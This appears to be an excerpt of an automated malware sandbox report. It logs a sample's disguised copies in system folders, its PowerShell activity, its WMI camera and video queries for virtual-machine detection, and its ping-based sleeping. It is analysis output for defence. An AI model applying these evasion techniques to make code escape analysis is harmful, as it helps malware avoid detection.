                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Uses ping.exe to sleep
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeMemory allocated: 920000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeMemory allocated: 1A640000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\conhost.exeMemory allocated: 1200000 memory reserve | memory write watch
                          Source: C:\Recovery\conhost.exeMemory allocated: 1AE80000 memory reserve | memory write watch
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeMemory allocated: 1170000 memory reserve | memory write watch
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeMemory allocated: 1AC90000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeMemory allocated: F00000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeMemory allocated: 1A990000 memory reserve | memory write watch
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeMemory allocated: F60000 memory reserve | memory write watch
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeMemory allocated: 1AD60000 memory reserve | memory write watch
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeMemory allocated: 1140000 memory reserve | memory write watch
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeMemory allocated: 1B030000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeMemory allocated: E10000 memory reserve | memory write watch
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeMemory allocated: 1AB50000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Recovery\conhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 922337203685477
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeThread delayed: delay time: 600000
